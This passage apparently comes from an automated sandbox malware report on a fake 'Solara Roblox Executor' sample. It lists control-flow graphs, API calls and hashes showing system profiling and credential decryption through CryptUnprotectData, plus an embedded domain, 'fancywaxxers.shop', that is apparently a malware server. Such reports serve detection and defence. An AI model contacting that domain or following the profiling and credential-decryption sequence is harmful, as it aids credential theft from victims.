                                                                                          • Instruction Fuzzy Hash: 5B815DBB928320EFC7005FB8AC4566B7BA4FB5F751F060C3CF99193161D23999128B56

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 44 4374e0-437507 45 437510-437531 44->45 45->45 46 437533-437541 45->46 47 437550-43757c 46->47 47->47 48 43757e-4375bf 47->48 49 4375c0-4375d2 48->49 49->49 50 4375d4-4375f0 49->50 52 4375f2-437602 50->52 53 437635-43763e 50->53 55 437610-437629 52->55 54 437640-437689 53->54 54->54 56 43768b-4376e5 CoCreateInstance 54->56 55->55 57 43762b-437630 55->57 58 4376eb-43771f 56->58 59 437b68-437b98 call 43e2b0 GetVolumeInformationW 56->59 57->53 60 437720-437785 58->60 64 437ba2-437ba4 59->64 65 437b9a-437b9e 59->65 60->60 62 437787-4377b2 SysAllocString 60->62 70 437b57-437b64 SysFreeString 62->70 71 4377b8-4377d2 CoSetProxyBlanket 62->71 66 437bbd-437bc4 64->66 65->64 68 437bd0-437be9 66->68 69 437bc6-437bcd 66->69 72 437bf0-437c3b 68->72 69->68 70->59 73 4377d8-4377ea 71->73 74 437b4d-437b53 71->74 72->72 75 437c3d-437c6a 72->75 76 4377f0-437815 73->76 74->70 77 437c70-437c9a 75->77 76->76 78 437817-43788f SysAllocString 76->78 77->77 79 437c9c-437cc8 call 41e3f0 77->79 80 437890-4378bb 78->80 84 437cd0-437cd8 79->84 80->80 82 4378bd-4378e6 SysAllocString 80->82 86 437b3b-437b4b SysFreeString * 2 82->86 87 4378ec-437912 82->87 84->84 88 437cda-437cdc 84->88 86->74 94 437918-43791b 87->94 95 437b2d-437b37 87->95 89 437ce2-437cf2 call 4080b0 88->89 90 437bb0-437bb7 88->90 89->90 90->66 92 437cf7-437cfe 90->92 94->95 97 437921-437926 94->97 95->86 97->95 98 43792c-437978 VariantInit 97->98 100 437980-437a25 98->100 100->100 101 437a2b-437a41 100->101 102 437a45-437a4a 101->102 103 437a50-437a56 102->103 104 437b1c-437b29 VariantClear 102->104 103->104 105 437a5c-437a6a 103->105 104->95 106 437ab5 105->106 107 437a6c-437a71 105->107 108 437ab7-437adf call 407f20 call 408bd0 106->108 109 437a8c-437a90 107->109 120 437ae1 108->120 121 437ae6-437af2 108->121 110 437a92-437a9b 109->110 111 437a80 109->111 113 437aa2-437aa6 110->113 114 437a9d-437aa0 110->114 116 437a81-437a8a 111->116 113->116 117 437aa8-437ab3 113->117 114->116 116->108 116->109 117->116 120->121 122 437af4 121->122 123 437af9-437b19 call 407f50 call 407f30 121->123 122->123 123->104
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 004376DD
                                                                                          • SysAllocString.OLEAUT32(6C9C6E9F), ref: 0043778C
                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004377CA
                                                                                          • SysAllocString.OLEAUT32(19691F61), ref: 0043781C
                                                                                          • SysAllocString.OLEAUT32(BD01C371), ref: 004378C2
                                                                                          • VariantInit.OLEAUT32(E7E6E59C), ref: 00437931
                                                                                          • VariantClear.OLEAUT32(?), ref: 00437B1D
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00437B45
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00437B4B
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00437B58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                          • String ID: BS$C$NG$UW
                                                                                          • API String ID: 2485776651-3261164861
                                                                                          • Opcode ID: 20eaceddd8dd319de19754652c22aa8ff6878be30dcee502cd68ab5d46434a8f
                                                                                          • Instruction ID: 2aeba2e1066070774754ebb0687e9c69391b23f1472e6c47106a6c124882539a
                                                                                          • Opcode Fuzzy Hash: 20eaceddd8dd319de19754652c22aa8ff6878be30dcee502cd68ab5d46434a8f
                                                                                          • Instruction Fuzzy Hash: 592212B2A083009BD314CF24C881B5BBBE6FBC9714F14892DE9D597391D778E906CB96

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 128 40da95-40dabb call 4094e0 CoUninitialize 131 40dac0-40dae5 128->131 131->131 132 40dae7-40dafa 131->132 133 40db00-40db39 132->133 133->133 134 40db3b-40db9b 133->134 135 40dba0-40dbcf 134->135 135->135 136 40dbd1-40dbe2 135->136 137 40dbe4-40dbf2 136->137 138 40dc0b-40dc13 136->138 139 40dc00-40dc09 137->139 140 40dc15-40dc16 138->140 141 40dc2b-40dc35 138->141 139->138 139->139 142 40dc20-40dc29 140->142 143 40dc37-40dc3b 141->143 144 40dc4b-40dc53 141->144 142->141 142->142 145 40dc40-40dc49 143->145 146 40dc55-40dc56 144->146 147 40dc6b-40dc75 144->147 145->144 145->145 148 40dc60-40dc69 146->148 149 40dc77-40dc7b 147->149 150 40dc8b-40dc97 147->150 148->147 148->148 151 40dc80-40dc89 149->151 152 40dcb1-40ddcf 150->152 153 40dc99-40dc9b 150->153 151->150 151->151 155 40ddd0-40ddea 152->155 154 40dca0-40dcad 153->154 154->154 156 40dcaf 154->156 155->155 157 40ddec-40de05 155->157 156->152 158 40de10-40de48 157->158 158->158 159 40de4a-40dea7 call 40b4d0 call 4094e0 CoUninitialize 158->159 164 40deb0-40ded5 159->164 164->164 165 40ded7-40deea 164->165 166 40def0-40df29 165->166 166->166 167 40df2b-40df8b 166->167 168 40df90-40dfbf 167->168 168->168 169 40dfc1-40dfd2 168->169 170 40dfd4-40dfe2 169->170 171 40dffb-40e003 169->171 172 40dff0-40dff9 170->172 173 40e005-40e006 171->173 174 40e01b-40e025 171->174 172->171 172->172 175 40e010-40e019 173->175 176 40e027-40e02b 174->176 177 40e03b-40e043 174->177 175->174 175->175 178 40e030-40e039 176->178 179 40e045-40e046 177->179 180 40e05b-40e065 177->180 178->177 178->178 183 40e050-40e059 179->183 181 40e067-40e06b 180->181 182 40e07b-40e087 180->182 184 40e070-40e079 181->184 185 40e0a1-40e1b9 182->185 186 40e089-40e08b 182->186 183->180 183->183 184->182 184->184 188 40e1c0-40e1da 185->188 187 40e090-40e09d 186->187 187->187 189 40e09f 187->189 188->188 190 40e1dc-40e1f8 188->190 189->185 191 40e200-40e238 190->191 191->191 192 40e23a-40e28a call 40b4d0 191->192
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Uninitialize
                                                                                          • String ID: @C$C]$IP$ZV$fancywaxxers.shop$ssr$|}$QS$y{
                                                                                          • API String ID: 3861434553-2220828355
                                                                                          • Opcode ID: 8ec32a82f3126b400308a62f5df11fed1079a828d8b44a30aeaeb35521acffc4
                                                                                          • Instruction ID: c610bb7a6f26eae1edb8d755431fd6f30510e5416d743ca2efd8223496c67b40
                                                                                          • Opcode Fuzzy Hash: 8ec32a82f3126b400308a62f5df11fed1079a828d8b44a30aeaeb35521acffc4
                                                                                          • Instruction Fuzzy Hash: F712EF7050C3D09ED3318F6598A439BBFE1AFE6310F184AADD0C95B392D739490ACB96

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 195 423811-423817 196 423820 195->196 197 423819-42381e 195->197 198 423823-423841 call 407f20 RtlExpandEnvironmentStrings 196->198 197->198 201 423850 198->201 202 423871-42387a 198->202 203 423848 198->203 201->202 204 423883 202->204 205 42387c-423881 202->205 203->201 206 42388a-4238c2 call 407f20 204->206 205->206 209 4238d0-4238f5 206->209 209->209 210 4238f7-423900 209->210 211 423902-423907 210->211 212 423921-42392e 210->212 213 423910-42391f 211->213 214 423930-423934 212->214 215 423951-423969 call 43fac0 212->215 213->212 213->213 216 423940-42394f 214->216 219 423980-42398c 215->219 220 423970-423977 215->220 221 423b20-423bc8 215->221 222 423c06-423c1f 215->222 223 423b1a 215->223 224 423d3b 215->224 225 423b08-423b12 215->225 216->215 216->216 226 423995 219->226 227 42398e-423993 219->227 220->219 228 423bd0-423be4 221->228 229 423c20-423c60 222->229 223->221 231 423d41 224->231 225->223 230 42399c-423a44 call 407f20 226->230 227->230 228->228 232 423be6-423bf6 call 421570 228->232 229->229 233 423c62-423ce3 229->233 242 423a50-423a87 230->242 239 423d47-423d4d call 407f30 231->239 240 423bfb-423bfe 232->240 234 423cf0-423d0e 233->234 234->234 237 423d10-423d33 call 4213d0 234->237 237->224 249 423d50-423d55 239->249 240->222 242->242 245 423a89-423a94 242->245 247 423ab1-423abe 245->247 248 423a96-423a9f 245->248 252 423ac0-423ac4 247->252 253 423ae1-423b01 GetLogicalDrives call 43fac0 247->253 250 423aa0-423aaf 248->250 251 423d60 249->251 250->247 250->250 257 423d62-423d6e 251->257 255 423ad0-423adf 252->255 253->222 253->223 253->224 253->225 253->231 253->239 253->249 253->251 253->257 258 423d80 253->258 259 423d86 253->259 260 423d8f-423d95 call 407f30 253->260 261 423d6f-423d78 call 407f30 253->261 262 423d98-423d9e call 407f30 253->262 255->253 255->255 258->259 259->260 260->262 261->258
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?), ref: 00423836
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: QE$T^$\$`8B$b=B$pj
                                                                                          • API String ID: 237503144-3832622935
                                                                                          • Opcode ID: 0cd9791aff82b6cd7fccf96c581a62d19902d81c30b2ea19fcab95dfeaf2d4eb
                                                                                          • Instruction ID: 6363133fec5b291e7bd2b5c7661d9de21d388bc679ce722e98939a667b697044
                                                                                          • Opcode Fuzzy Hash: 0cd9791aff82b6cd7fccf96c581a62d19902d81c30b2ea19fcab95dfeaf2d4eb
                                                                                          • Instruction Fuzzy Hash: 50D1C9B0A083448FD710DF55E89162BBBF0FB86349F44892DF5998B352E3789945CB8A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 398 408690-4086a1 call 43bc90 401 4086a7-4086ae call 434ce0 398->401 402 40892f-408931 ExitProcess 398->402 405 4086b4-408702 GetCurrentProcessId GetCurrentThreadId 401->405 406 40892a call 43c620 401->406 407 408704-408707 405->407 408 408709-408712 405->408 406->402 407->408 410 408714 408->410 411 408716-40880a SHGetSpecialFolderPathW 408->411 410->411 412 408810-40884c 411->412 412->412 413 40884e-40887f call 43a8d0 412->413 416 408880-40889c 413->416 417 4088b6-4088cd GetForegroundWindow 416->417 418 40889e-4088b4 416->418 419 4088f4-40890c call 4099b0 417->419 420 4088cf-4088f2 417->420 418->416 423 408918-40891f 419->423 424 40890e call 40c650 419->424 420->419 423->406 426 408921-408927 call 407f30 423->426 427 408913 call 40b4a0 424->427 426->406 427->423
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004086B4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004086BE
                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087CA
                                                                                          • GetForegroundWindow.USER32 ref: 004088C5
                                                                                          • ExitProcess.KERNEL32 ref: 00408931
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                          • String ID:
                                                                                          • API String ID: 4063528623-0
                                                                                          • Opcode ID: d117fd8a260b4d1960ece9cdb3354f165178d4dd5b281eae34d4f7d0227ac3f6
                                                                                          • Instruction ID: 8ede48481e1735f962ef943b25c32375d9938f45e32adf7daae5272a9be7713e
                                                                                          • Opcode Fuzzy Hash: d117fd8a260b4d1960ece9cdb3354f165178d4dd5b281eae34d4f7d0227ac3f6
                                                                                          • Instruction Fuzzy Hash: FA6176B7F043144BD718AE69CD8636AB5C69BC4310F1E853EA898EB3D1EE7C9C0582C5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 435 42b8c3-42cc26 call 432c00 call 407f30 441 42cc30-42cc62 435->441 441->441 442 42cc64-42cc6b 441->442 443 42cc8b-42cc97 442->443 444 42cc6d-42cc71 442->444 446 42ccb1-42cd0f call 43e2b0 GetPhysicallyInstalledSystemMemory 443->446 447 42cc99-42cc9b 443->447 445 42cc80-42cc89 444->445 445->443 445->445 452 42cd10-42cd43 446->452 448 42cca0-42ccad 447->448 448->448 450 42ccaf 448->450 450->446 452->452 453 42cd45-42cd7b call 41e3f0 452->453 456 42cd80-42cdc2 453->456 456->456 457 42cdc4-42cdcb 456->457 458 42cdeb-42cdf3 457->458 459 42cdcd-42cdd1 457->459 461 42cdf5-42cdf6 458->461 462 42ce0b-42ce18 458->462 460 42cde0-42cde9 459->460 460->458 460->460 463 42ce00-42ce09 461->463 464 42ce1a-42ce21 462->464 465 42ce3b-42ce8a 462->465 463->462 463->463 466 42ce30-42ce39 464->466 467 42ce90-42cea4 465->467 466->465 466->466 467->467 468 42cea6-42cead 467->468 469 42cecb-42ced8 468->469 470 42ceaf-42ceb3 468->470 472 42ceda-42cee1 469->472 473 42cefb-42cf9a 469->473 471 42cec0-42cec9 470->471 471->469 471->471 474 42cef0-42cef9 472->474 474->473 474->474
                                                                                          APIs
                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CCE5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                          • String ID: mJ
                                                                                          • API String ID: 3960555810-126070683
                                                                                          • Opcode ID: f03efc9397f3033fe743b8df9adf057a632e3b820ccdadc1fd3a85e2bf9479ec
                                                                                          • Instruction ID: d3edd6ecf3c5bcb37c2bc7934cbc24c1904aae8e85cd39f9a47c956bce1dc71a
                                                                                          • Opcode Fuzzy Hash: f03efc9397f3033fe743b8df9adf057a632e3b820ccdadc1fd3a85e2bf9479ec
                                                                                          • Instruction Fuzzy Hash: 8691F47050C3928AD739CF2994607ABBFE1AF96304F18486ED0C997292E7398506CB97
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1e8737c3bbac419c073c8e73b68b15f7a7f2a9a6c96eb184638410891f8ec42c
                                                                                          • Instruction ID: 86b5bbd252f56c8b31140c0c9175a5acd21a30d65fc6c0985deb9c3e02555efd
                                                                                          • Opcode Fuzzy Hash: 1e8737c3bbac419c073c8e73b68b15f7a7f2a9a6c96eb184638410891f8ec42c
                                                                                          • Instruction Fuzzy Hash: 6B721875A04B408FD714DF38C885396BBE2AF95314F198A3ED9EA877D2D638E445CB02
                                                                                          APIs
                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00417422
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CryptDataUnprotect
                                                                                          • String ID:
                                                                                          • API String ID: 834300711-0
                                                                                          • Opcode ID: c38e4abd3a16c5d3d6da9e63e775c59da54069e2d095b0eb7f0d949787040c09
                                                                                          • Instruction ID: 626973797c0056d3d8d6f11a3cdc509ba32d2cf50b32cf2ce84dace285bdcab7
                                                                                          • Opcode Fuzzy Hash: c38e4abd3a16c5d3d6da9e63e775c59da54069e2d095b0eb7f0d949787040c09
                                                                                          • Instruction Fuzzy Hash: CF81F4B150C2429FC724CF28C8517ABB7F1AF95314F18896EE49987392E738D986CB46
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL(0043FA9D,?,00000018,?,?,00000018,?,?,?), ref: 0043C6DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: >
                                                                                          • API String ID: 0-325317158
                                                                                          • Opcode ID: 98223da683e24e277a8c5ed51c90ccc8e85816ab88d1a3cb8bed61bcff2eae68
                                                                                          • Instruction ID: 60c150bb56a25fce4e0004a13e1ffe521c8b29bb56f0fa5ab9c04c764cccfbfe
                                                                                          • Opcode Fuzzy Hash: 98223da683e24e277a8c5ed51c90ccc8e85816ab88d1a3cb8bed61bcff2eae68
                                                                                          • Instruction Fuzzy Hash: 3D41AD21E086A24BD704CB2C98412B7FB91DF67354F59866ED8D5CB382D32CD846C3DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: @
                                                                                          • API String ID: 2994545307-2766056989
                                                                                          • Opcode ID: 56665c6da26064b575c2537206edd939f3da4c3ac38f5dc4cd80a82db574da6b
                                                                                          • Instruction ID: 6807644c5d023bddaf5b1f6096250f87d695de9c0eb8c49eb476749c76d675ad
                                                                                          • Opcode Fuzzy Hash: 56665c6da26064b575c2537206edd939f3da4c3ac38f5dc4cd80a82db574da6b
                                                                                          • Instruction Fuzzy Hash: 8421ABB55093009BD310DF19D88462BFBF9FFCA324F14A92DE59897391E33598048B6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 2551022070fb84c9be72c7adfed6f47c8044bf460f669702c44befff69b69773
                                                                                          • Instruction ID: 89752d59b22e552cc1b3624904c48c474edb0510461437a8e66cbbcbb2a827d3
                                                                                          • Opcode Fuzzy Hash: 2551022070fb84c9be72c7adfed6f47c8044bf460f669702c44befff69b69773
                                                                                          • Instruction Fuzzy Hash: B5918E72B043205BD7288F65FC8377BB292EBC5318F5A853EE98657381E67C9C05874A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: eb778ec77485ab17806605ecffe043a8dc004d260345baee18e2d7b4f2081fbe
                                                                                          • Instruction ID: 9c8d90313b322bdcd2648fd3295d181bdb9ba862931c76569345c480668c26a6
                                                                                          • Opcode Fuzzy Hash: eb778ec77485ab17806605ecffe043a8dc004d260345baee18e2d7b4f2081fbe
                                                                                          • Instruction Fuzzy Hash: EF618C72B483004BE7289E25CC8177BB793EBC9314F19983ED6C55B392E6789C52874A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 475 42bfe5-42bfef 476 42bff1-42bff8 475->476 477 42c00b-42c058 FreeLibrary call 43e2b0 475->477 478 42c000-42c009 476->478 483 42c060-42c086 477->483 478->477 478->478 483->483 484 42c088-42c092 483->484 485 42c094-42c09b 484->485 486 42c0ab-42c0fc GetComputerNameExA 484->486 487 42c0a0-42c0a9 485->487 488 42c0fe 486->488 487->486 487->487 488->488
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042C015
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerFreeLibraryName
                                                                                          • String ID:
                                                                                          • API String ID: 2904949787-0
                                                                                          • Opcode ID: d96fea4e6257e4c78ffb554b289efb03b8e51e5e0d2c6f3ac5258e9002211423
                                                                                          • Instruction ID: 8d9c6549bc25777c5240e84b17f1ca750e90f0eb3d57af2790fa8dbf1b0839c8
                                                                                          • Opcode Fuzzy Hash: d96fea4e6257e4c78ffb554b289efb03b8e51e5e0d2c6f3ac5258e9002211423
                                                                                          • Instruction Fuzzy Hash: FC2108716083918FC7358B25D8A0BEBBFE1AF8B304F54486DD0C9D7242DB354509D756

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 489 42bfe3-42c058 FreeLibrary call 43e2b0 494 42c060-42c086 489->494 494->494 495 42c088-42c092 494->495 496 42c094-42c09b 495->496 497 42c0ab-42c0fc GetComputerNameExA 495->497 498 42c0a0-42c0a9 496->498 499 42c0fe 497->499 498->497 498->498 499->499
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042C015
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerFreeLibraryName
                                                                                          • String ID:
                                                                                          • API String ID: 2904949787-0
                                                                                          • Opcode ID: a43e626c617e0f5b7cb83e1fb4221ea60791d33f85f50ac47f0bb6e041d23e2b
                                                                                          • Instruction ID: e6454d7e6264a6da6bf3dd5ff13132aeabb15ad0ac44c7d8a9f8b74ac14de22b
                                                                                          • Opcode Fuzzy Hash: a43e626c617e0f5b7cb83e1fb4221ea60791d33f85f50ac47f0bb6e041d23e2b
                                                                                          • Instruction Fuzzy Hash: 832124716183818BC7258F29D8A0BAFBBE5AF8A314F54886DD0CAD7251DB31450ADB16
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID:
                                                                                          • API String ID: 3545744682-0
                                                                                          • Opcode ID: 580b99c8e626a2e61bb62fe38b60c0f15514af6f0c16ccc8df652c953a0a01b2
                                                                                          • Instruction ID: 5cb1f8e390387c2d5bf378eb707ebf3e44180718c353ead536809b07d6827398
                                                                                          • Opcode Fuzzy Hash: 580b99c8e626a2e61bb62fe38b60c0f15514af6f0c16ccc8df652c953a0a01b2
                                                                                          • Instruction Fuzzy Hash: 231159716083818BC725CF29D8A0BEBBBD59F8A314F548C6DC0C9D7241DB31450AD716
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042D8FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID:
                                                                                          • API String ID: 3545744682-0
                                                                                          • Opcode ID: a0f2b7ae8f42de89da95dabbfb162138e3e028de9b94eaaaacad31c45893ab19
                                                                                          • Instruction ID: b1328b629a4901df70fe6737cf23ebc979e758bad0d5d00b5efd17457f7cace7
                                                                                          • Opcode Fuzzy Hash: a0f2b7ae8f42de89da95dabbfb162138e3e028de9b94eaaaacad31c45893ab19
                                                                                          • Instruction Fuzzy Hash: 2101D27450C3D08BD724DB25D4587ABBFE5AFA6704F288CADD4D68B341CA345405CB66
                                                                                          APIs
                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 0043672B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: DefaultLanguageUser
                                                                                          • String ID:
                                                                                          • API String ID: 95929093-0
                                                                                          • Opcode ID: 1c81b3708a00711999cbdb9b5a6b5a899258ba297497b33ab73c7a36183b33ab
                                                                                          • Instruction ID: 280fd79d06aff116d5ecce700f831f7330868030a01968b370003e1ee4d4f53d
                                                                                          • Opcode Fuzzy Hash: 1c81b3708a00711999cbdb9b5a6b5a899258ba297497b33ab73c7a36183b33ab
                                                                                          • Instruction Fuzzy Hash: 4721C2369042668FCB24CF3D8C412EEBBF0AB4A310F0945EDD458E7381DA344A41DF91
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0043C577
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 9579234a0d3020c9bbccd6177cbaeb44dce239ed60d1b0632adf1eb9ca13027a
                                                                                          • Instruction ID: 911dd8d51dd45e87027dc5049aa6d8bf0b8fc62c940d04092f590b9884291e7f
                                                                                          • Opcode Fuzzy Hash: 9579234a0d3020c9bbccd6177cbaeb44dce239ed60d1b0632adf1eb9ca13027a
                                                                                          • Instruction Fuzzy Hash: 5301ADB86816029FD7088F34AC6162ABB70FB57710F18C12ED552E7791DB38B8229F94
                                                                                          APIs
                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B3B6,00000000,00000001), ref: 0043C672
                                                                                          Memory Dump Source
